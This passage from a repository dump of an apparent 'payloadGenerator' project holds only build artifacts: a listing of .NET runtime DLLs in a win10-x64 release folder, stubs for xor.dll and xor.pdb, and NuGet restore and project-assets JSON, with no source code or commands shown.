/opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Linq.Expressions.dll 67 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Linq.Parallel.dll 68 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Linq.Queryable.dll 69 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Linq.dll 70 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Memory.dll 71 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.Http.dll 72 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.HttpListener.dll 73 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.Mail.dll 74 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.NameResolution.dll 75 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.NetworkInformation.dll 76 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.Ping.dll 77 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.Primitives.dll 78 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.Requests.dll 79 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.Security.dll 80 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.ServicePoint.dll 81 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.Sockets.dll 82 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.WebClient.dll 83 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.WebHeaderCollection.dll 84 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.WebProxy.dll 85 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.WebSockets.Client.dll 86 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.WebSockets.dll 87 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Net.dll 88 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Numerics.Vectors.dll 89 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Numerics.dll 90 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ObjectModel.dll 91 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Private.DataContractSerialization.dll 92 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Private.Uri.dll 93 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Private.Xml.Linq.dll 94 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Private.Xml.dll 95 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.DispatchProxy.dll 96 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.Emit.ILGeneration.dll 97 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.Emit.Lightweight.dll 98 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.Emit.dll 99 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.Extensions.dll 100 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.Metadata.dll 101 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.Primitives.dll 102 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.TypeExtensions.dll 103 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Reflection.dll 104 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Resources.Reader.dll 105 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Resources.ResourceManager.dll 106 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Resources.Writer.dll 107 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.CompilerServices.Unsafe.dll 108 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.CompilerServices.VisualC.dll 109 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Extensions.dll 110 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Handles.dll 111 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.InteropServices.RuntimeInformation.dll 112 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.InteropServices.WindowsRuntime.dll 113 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.InteropServices.dll 114 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Intrinsics.dll 115 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Loader.dll 116 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Numerics.dll 117 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Serialization.Formatters.dll 118 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Serialization.Json.dll 119 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Serialization.Primitives.dll 120 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Serialization.Xml.dll 121 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.Serialization.dll 122 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.WindowsRuntime.UI.Xaml.dll 123 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.WindowsRuntime.dll 124 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Runtime.dll 125 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.AccessControl.dll 126 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Claims.dll 127 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Cryptography.Algorithms.dll 128 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Cryptography.Cng.dll 129 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Cryptography.Csp.dll 130 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Cryptography.Encoding.dll 131 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Cryptography.OpenSsl.dll 132 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Cryptography.Primitives.dll 133 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Cryptography.X509Certificates.dll 134 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Principal.Windows.dll 135 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.Principal.dll 136 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.SecureString.dll 137 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Security.dll 138 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ServiceModel.Web.dll 139 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ServiceProcess.dll 140 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Text.Encoding.CodePages.dll 141 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Text.Encoding.Extensions.dll 142 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Text.Encoding.dll 143 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Text.Encodings.Web.dll 144 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Text.Json.dll 145 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Text.RegularExpressions.dll 146 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Channels.dll 147 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Overlapped.dll 148 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Tasks.Dataflow.dll 149 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Tasks.Extensions.dll 150 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Tasks.Parallel.dll 151 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Tasks.dll 152 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Thread.dll 153 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.ThreadPool.dll 154 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.Timer.dll 155 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Threading.dll 156 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Transactions.Local.dll 157 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Transactions.dll 158 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ValueTuple.dll 159 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Web.HttpUtility.dll 160 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Web.dll 161 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Windows.dll 162 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.Linq.dll 163 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.ReaderWriter.dll 164 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.Serialization.dll 165 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.XDocument.dll 166 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.XPath.XDocument.dll 167 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.XPath.dll 168 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.XmlDocument.dll 169 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.XmlSerializer.dll 170 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Xml.dll 171 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.dll 172 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/WindowsBase.dll 173 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/mscorlib.dll 174 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/netstandard.dll 175 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/Microsoft.DiaSymReader.Native.amd64.dll 176 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/SOS_README.md 177 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Private.CoreLib.dll 178 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-console-l1-1-0.dll 179 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-datetime-l1-1-0.dll 180 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-debug-l1-1-0.dll 181 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-errorhandling-l1-1-0.dll 182 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-file-l1-1-0.dll 183 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-file-l1-2-0.dll 184 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-file-l2-1-0.dll 185 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-handle-l1-1-0.dll 186 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-heap-l1-1-0.dll 187 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-interlocked-l1-1-0.dll 188 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-libraryloader-l1-1-0.dll 189 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-localization-l1-2-0.dll 190 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-memory-l1-1-0.dll 191 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-namedpipe-l1-1-0.dll 192 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-processenvironment-l1-1-0.dll 193 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-processthreads-l1-1-0.dll 194 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-processthreads-l1-1-1.dll 195 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-profile-l1-1-0.dll 196 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-rtlsupport-l1-1-0.dll 197 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-string-l1-1-0.dll 198 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-synch-l1-1-0.dll 199 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-synch-l1-2-0.dll 200 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-sysinfo-l1-1-0.dll 201 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-timezone-l1-1-0.dll 202 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-core-util-l1-1-0.dll 203 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-conio-l1-1-0.dll 204 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-convert-l1-1-0.dll 205 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-environment-l1-1-0.dll 206 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-filesystem-l1-1-0.dll 207 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-heap-l1-1-0.dll 208 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-locale-l1-1-0.dll 209 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-math-l1-1-0.dll 210 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-multibyte-l1-1-0.dll 211 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-private-l1-1-0.dll 212 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-process-l1-1-0.dll 213 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-runtime-l1-1-0.dll 214 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-stdio-l1-1-0.dll 215 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-string-l1-1-0.dll 216 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-time-l1-1-0.dll 217 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/api-ms-win-crt-utility-l1-1-0.dll 218 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/clrcompression.dll 219 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/clretwrc.dll 220 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/clrjit.dll 221 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/coreclr.dll 222 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/dbgshim.dll 223 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/hostfxr.dll 224 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/hostpolicy.dll 225 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/mscordaccore.dll 226 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/mscordaccore_amd64_amd64_4.700.21.16201.dll 227 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/mscordbi.dll 228 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/mscorrc.debug.dll 229 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/mscorrc.dll 230 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/ucrtbase.dll 231 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csproj.CopyComplete 232 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.dll 233 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.pdb 234 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.genruntimeconfig.cache 235 | -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.dll -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 1d0d65263e3c52134fb5e2d7d9ef4e39060b068b 2 | -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.pdb -------------------------------------------------------------------------------- /Payload/obj/payload.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "/opt/Generator/Payload/payload.csproj": {} 5 | }, 6 | "projects": { 7 | "/opt/Generator/Payload/payload.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "/opt/Generator/Payload/payload.csproj", 11 | "projectName": "payload", 12 | "projectPath": "/opt/Generator/Payload/payload.csproj", 13 | "packagesPath": "/home/kali/.nuget/packages/", 14 | "outputPath": "/opt/Generator/Payload/obj/", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "/home/kali/.nuget/NuGet/NuGet.Config" 18 | ], 19 | "originalTargetFrameworks": [ 20 | "net45" 21 | ], 22 | "sources": { 23 | "https://api.nuget.org/v3/index.json": {} 24 | }, 25 | "frameworks": { 26 | "net45": { 27 | "targetAlias": "net45", 28 | "projectReferences": {} 29 | } 30 | }, 31 | "warningProperties": { 32 | "warnAsError": [ 33 | "NU1605" 34 | ] 35 | } 36 | }, 37 | "frameworks": { 38 | "net45": { 39 | "targetAlias": "net45", 40 | "dependencies": { 41 | "Microsoft.NETFramework.ReferenceAssemblies": { 42 | "suppressParent": "All", 43 | "target": "Package", 44 | "version": "[1.0.0, )", 45 | "autoReferenced": true 46 | } 47 | }, 48 | "runtimeIdentifierGraphPath": "/usr/share/dotnet/sdk/5.0.202/RuntimeIdentifierGraph.json" 49 | } 50 | }, 51 | "runtimes": { 52 | "win10-x64": { 53 | "#import": [] 54 | } 55 | } 56 | } 57 | } 58 | } -------------------------------------------------------------------------------- /Payload/obj/payload.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | /home/kali/.nuget/packages/ 8 | /home/kali/.nuget/packages/ 9 | PackageReference 10 | 5.9.1 11 | 12 | 13 | 14 | 15 | 16 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 17 | 18 | -------------------------------------------------------------------------------- /Payload/obj/payload.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Payload/obj/project.assets.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": 3, 3 | "targets": { 4 | ".NETFramework,Version=v4.5": { 5 | "Microsoft.NETFramework.ReferenceAssemblies/1.0.0": { 6 | "type": "package", 7 | "dependencies": { 8 | "Microsoft.NETFramework.ReferenceAssemblies.net45": "1.0.0" 9 | } 10 | }, 11 | "Microsoft.NETFramework.ReferenceAssemblies.net45/1.0.0": { 12 | "type": "package", 13 | "build": { 14 | "build/Microsoft.NETFramework.ReferenceAssemblies.net45.targets": {} 15 | } 16 | } 17 | }, 18 | ".NETFramework,Version=v4.5/win10-x64": { 19 | "Microsoft.NETFramework.ReferenceAssemblies/1.0.0": { 20 | "type": "package", 21 | "dependencies": { 22 | "Microsoft.NETFramework.ReferenceAssemblies.net45": "1.0.0" 23 | } 24 | }, 25 | "Microsoft.NETFramework.ReferenceAssemblies.net45/1.0.0": { 26 | "type": "package", 27 | "build": { 28 | "build/Microsoft.NETFramework.ReferenceAssemblies.net45.targets": {} 29 | } 30 | } 31 | } 32 | }, 33 | "libraries": { 34 | "Microsoft.NETFramework.ReferenceAssemblies/1.0.0": { 35 | "sha512": "7D2TMufjGiowmt0E941kVoTIS+GTNzaPopuzM1/1LSaJAdJdBrVP0SkZW7AgDd0a2U1DjsIeaKG1wxGVBNLDMw==", 36 | "type": "package", 37 | "path": "microsoft.netframework.referenceassemblies/1.0.0", 38 | "files": [ 39 | ".nupkg.metadata", 40 | ".signature.p7s", 41 | "microsoft.netframework.referenceassemblies.1.0.0.nupkg.sha512", 42 | "microsoft.netframework.referenceassemblies.nuspec" 43 | ] 44 | }, 45 | "Microsoft.NETFramework.ReferenceAssemblies.net45/1.0.0": { 46 | "sha512": "f7XMQsZFaoc3w8Vg3VQ3FHuU2C9vf0Ng5EAV4gzdNWDerPM/OmrzccLj15eI1wCLLXj4jk8+lKsbonzJeyXgQQ==", 47 | "type": "package", 48 | "path": "microsoft.netframework.referenceassemblies.net45/1.0.0", 49 | "files": [ 50 | ".nupkg.metadata", 51 | ".signature.p7s", 52 | "build/.NETFramework/v4.5/Accessibility.dll", 53 | "build/.NETFramework/v4.5/Accessibility.xml", 54 | "build/.NETFramework/v4.5/CustomMarshalers.dll", 55 | "build/.NETFramework/v4.5/CustomMarshalers.xml", 56 | "build/.NETFramework/v4.5/Facades/System.Collections.Concurrent.dll", 57 | "build/.NETFramework/v4.5/Facades/System.Collections.dll", 58 | "build/.NETFramework/v4.5/Facades/System.ComponentModel.Annotations.dll", 59 | "build/.NETFramework/v4.5/Facades/System.ComponentModel.EventBasedAsync.dll", 60 | "build/.NETFramework/v4.5/Facades/System.ComponentModel.dll", 61 | "build/.NETFramework/v4.5/Facades/System.Diagnostics.Contracts.dll", 62 | "build/.NETFramework/v4.5/Facades/System.Diagnostics.Debug.dll", 63 | "build/.NETFramework/v4.5/Facades/System.Diagnostics.Tools.dll", 64 | "build/.NETFramework/v4.5/Facades/System.Diagnostics.Tracing.dll", 65 | "build/.NETFramework/v4.5/Facades/System.Dynamic.Runtime.dll", 66 | "build/.NETFramework/v4.5/Facades/System.Globalization.dll", 67 | "build/.NETFramework/v4.5/Facades/System.IO.dll", 68 | "build/.NETFramework/v4.5/Facades/System.Linq.Expressions.dll", 69 | "build/.NETFramework/v4.5/Facades/System.Linq.Parallel.dll", 70 | "build/.NETFramework/v4.5/Facades/System.Linq.Queryable.dll", 71 | "build/.NETFramework/v4.5/Facades/System.Linq.dll", 72 | "build/.NETFramework/v4.5/Facades/System.Net.NetworkInformation.dll", 73 | "build/.NETFramework/v4.5/Facades/System.Net.Primitives.dll", 74 | "build/.NETFramework/v4.5/Facades/System.Net.Requests.dll", 75 | "build/.NETFramework/v4.5/Facades/System.ObjectModel.dll", 76 | "build/.NETFramework/v4.5/Facades/System.Reflection.Emit.ILGeneration.dll", 77 | "build/.NETFramework/v4.5/Facades/System.Reflection.Emit.Lightweight.dll", 78 | "build/.NETFramework/v4.5/Facades/System.Reflection.Emit.dll", 79 | "build/.NETFramework/v4.5/Facades/System.Reflection.Extensions.dll", 80 | "build/.NETFramework/v4.5/Facades/System.Reflection.Primitives.dll", 81 | "build/.NETFramework/v4.5/Facades/System.Reflection.dll", 82 | "build/.NETFramework/v4.5/Facades/System.Resources.ResourceManager.dll", 83 | "build/.NETFramework/v4.5/Facades/System.Runtime.Extensions.dll", 84 | "build/.NETFramework/v4.5/Facades/System.Runtime.InteropServices.WindowsRuntime.dll", 85 | "build/.NETFramework/v4.5/Facades/System.Runtime.InteropServices.dll", 86 | "build/.NETFramework/v4.5/Facades/System.Runtime.Numerics.dll", 87 | "build/.NETFramework/v4.5/Facades/System.Runtime.Serialization.Json.dll", 88 | "build/.NETFramework/v4.5/Facades/System.Runtime.Serialization.Primitives.dll", 89 | "build/.NETFramework/v4.5/Facades/System.Runtime.Serialization.Xml.dll", 90 | "build/.NETFramework/v4.5/Facades/System.Runtime.dll", 91 | "build/.NETFramework/v4.5/Facades/System.Security.Principal.dll", 92 | "build/.NETFramework/v4.5/Facades/System.ServiceModel.Duplex.dll", 93 | "build/.NETFramework/v4.5/Facades/System.ServiceModel.Http.dll", 94 | "build/.NETFramework/v4.5/Facades/System.ServiceModel.NetTcp.dll", 95 | "build/.NETFramework/v4.5/Facades/System.ServiceModel.Primitives.dll", 96 | "build/.NETFramework/v4.5/Facades/System.ServiceModel.Security.dll", 97 | "build/.NETFramework/v4.5/Facades/System.Text.Encoding.Extensions.dll", 98 | "build/.NETFramework/v4.5/Facades/System.Text.Encoding.dll", 99 | "build/.NETFramework/v4.5/Facades/System.Text.RegularExpressions.dll", 100 | "build/.NETFramework/v4.5/Facades/System.Threading.Tasks.Parallel.dll", 101 | "build/.NETFramework/v4.5/Facades/System.Threading.Tasks.dll", 102 | "build/.NETFramework/v4.5/Facades/System.Threading.dll", 103 | "build/.NETFramework/v4.5/Facades/System.Xml.ReaderWriter.dll", 104 | "build/.NETFramework/v4.5/Facades/System.Xml.XDocument.dll", 105 | "build/.NETFramework/v4.5/Facades/System.Xml.XmlSerializer.dll", 106 | "build/.NETFramework/v4.5/ISymWrapper.dll", 107 | "build/.NETFramework/v4.5/ISymWrapper.xml", 108 | "build/.NETFramework/v4.5/Microsoft.Activities.Build.dll", 109 | "build/.NETFramework/v4.5/Microsoft.Activities.Build.xml", 110 | "build/.NETFramework/v4.5/Microsoft.Build.Conversion.v4.0.dll", 111 | "build/.NETFramework/v4.5/Microsoft.Build.Conversion.v4.0.xml", 112 | "build/.NETFramework/v4.5/Microsoft.Build.Engine.dll", 113 | "build/.NETFramework/v4.5/Microsoft.Build.Engine.xml", 114 | "build/.NETFramework/v4.5/Microsoft.Build.Framework.dll", 115 | "build/.NETFramework/v4.5/Microsoft.Build.Framework.xml", 116 | "build/.NETFramework/v4.5/Microsoft.Build.Tasks.v4.0.dll", 117 | "build/.NETFramework/v4.5/Microsoft.Build.Tasks.v4.0.xml", 118 | "build/.NETFramework/v4.5/Microsoft.Build.Utilities.v4.0.dll", 119 | "build/.NETFramework/v4.5/Microsoft.Build.Utilities.v4.0.xml", 120 | "build/.NETFramework/v4.5/Microsoft.Build.dll", 121 | "build/.NETFramework/v4.5/Microsoft.Build.xml", 122 | "build/.NETFramework/v4.5/Microsoft.CSharp.dll", 123 | "build/.NETFramework/v4.5/Microsoft.CSharp.xml", 124 | "build/.NETFramework/v4.5/Microsoft.JScript.dll", 125 | "build/.NETFramework/v4.5/Microsoft.JScript.xml", 126 | "build/.NETFramework/v4.5/Microsoft.VisualBasic.Compatibility.Data.dll", 127 | "build/.NETFramework/v4.5/Microsoft.VisualBasic.Compatibility.Data.xml", 128 | "build/.NETFramework/v4.5/Microsoft.VisualBasic.Compatibility.dll", 129 | "build/.NETFramework/v4.5/Microsoft.VisualBasic.Compatibility.xml", 130 | "build/.NETFramework/v4.5/Microsoft.VisualBasic.dll", 131 | "build/.NETFramework/v4.5/Microsoft.VisualBasic.xml", 132 | "build/.NETFramework/v4.5/Microsoft.VisualC.STLCLR.dll", 133 | "build/.NETFramework/v4.5/Microsoft.VisualC.STLCLR.xml", 134 | "build/.NETFramework/v4.5/Microsoft.VisualC.dll", 135 | "build/.NETFramework/v4.5/Microsoft.VisualC.xml", 136 | "build/.NETFramework/v4.5/PermissionSets/FullTrust.xml", 137 | "build/.NETFramework/v4.5/PermissionSets/Internet.xml", 138 | 